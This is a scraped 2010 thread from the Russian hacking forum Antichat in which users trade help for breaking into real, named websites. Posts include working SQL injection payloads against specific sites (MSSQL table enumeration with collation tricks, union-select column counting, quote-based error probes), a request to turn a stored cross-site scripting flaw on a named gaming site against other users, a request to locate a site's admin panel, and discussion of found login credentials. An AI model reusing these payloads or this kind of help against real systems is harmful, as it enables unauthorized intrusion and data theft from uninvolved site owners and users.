Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
09.03.2010, 04:08
|
|
Новичок
Регистрация: 08.03.2010
Сообщений: 5
Провел на форуме:
8681
Репутация:
0
|
|
Сообщение от [Feldmarschall]
overcrookd в user есть
login:admin
password:666 может это и есть то самое?
п.с ток всеравно логин иле pwd не подходит
естессно я первым делом проверил это, увы, это login и pwd для входа на сайт, не админку.
всеоравно спасибо зв потраченое время 
|
|
|
09.03.2010, 04:37
|
|
Познающий
Регистрация: 22.02.2006
Сообщений: 50
Провел на форуме:
256744
Репутация:
16
|
|
Сообщение от попугай
где domen.com - сайт, где у тя скуля.
Так пробовал?
Да так тоже пробовал ничего
|
|
|
|
09.03.2010, 05:04
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от 4p3
Нашел сайт с mssql injection. Перебираю таблицы, но с кодировкой что-то не то. Вроде стоит cp1252
Подставляю это значение в запрос
Получаю тоже самое.
Расшифровываю, получаю Запрос_Стадии_Клиент. Пихаю в запрос. Опять та же самая ошибка. Не знаю что делать дальше, помогите, пожалуйста.
1 or 1=(select Val collate Cyrillic_General_CI_AS top 1 table_name from information_schema.tables where table_name not in ('rank_table','reklama'))
мб Val ненужен, и мб перед from поставить, сгуглил просто.
http://www.sql.ru/forum/actualthread.aspx?tid=415606
|
|
|
|
09.03.2010, 06:09
|
|
Участник форума
Регистрация: 18.08.2008
Сообщений: 159
Провел на форуме:
750247
Репутация:
92
|
|
Благодарю, я видел эту тему.
http://www.rosdiplom.ru/readyi2a1a2new.asp?id=1%20or%201=(select%20top%201 %20table_name%20collate%20Cyrillic_General_CI_AS%2 0from%20information_schema.tables%20where%20table_ name%20not%20in%20('rank_table','reklama'))
Все равно это не решает вопроса с кодировкой, ну и ладно. Видать, встроенными функциями этого не сделать. Пробовал уже и множество чаров, но нет.
Скуль - боян, но интересно, как его раскрутили пару лет назад. |
|
|
|
09.03.2010, 10:51
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
http://www.linumechilinum.am/?include=static2&page_id=49+union+/*!select*/+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52, 53,54,55,56,57,58,59,60
не как не мояу узнать числу..
помоqите//
|
|
|
|
09.03.2010, 16:02
|
|
Новичок
Регистрация: 08.03.2010
Сообщений: 1
Провел на форуме:
671
Репутация:
0
|
|
Есть сайт http://live-cs.ru/, на нем при установке статуса в профиле(http://live-cs.ru/people/Medic/ например) срабатывает введенный код, как это можно использовать, чтобы какой-нибудь другой юзер выполнил действие кода?
|
|
|
|
09.03.2010, 18:16
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008
Репутация:
58
|
|
2LokbatanLi
c чего ты взял что там скуля?
page_id=49+order+by+1/*
page_id=49'+order+by+1/*
page_id=49+0
нет результата...
вопрос
site?indwx.php?keyword=1'
Message: Can't execute query: You have an error in your SQL syntax; ... '/*%' OR
SELECT COUNT(u.user_id) FROM user AS ... AND (u.name LIKE '%1\'%')
никак не обойти?
заменять ' на %27 пробовал |
|
|
|
09.03.2010, 20:29
|
|
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
Провел на форуме:
1179199
Репутация:
127
|
|
Помогите найти админку http://www.f1-world.ru
|
|
|
|
09.03.2010, 21:54
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008
Репутация:
58
|
|
http://www.tomydate.com/search_results.php?keyword=1'
помогите)
|
|
|
|
09.03.2010, 21:54
|
|
Новичок
Регистрация: 08.03.2010
Сообщений: 5
Провел на форуме:
8681
Репутация:
0
|
|
плз подскажыте по посту #11976 я пока только учусь и эта "задачка" ну просто рвет мне мозг, не давая покоя.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
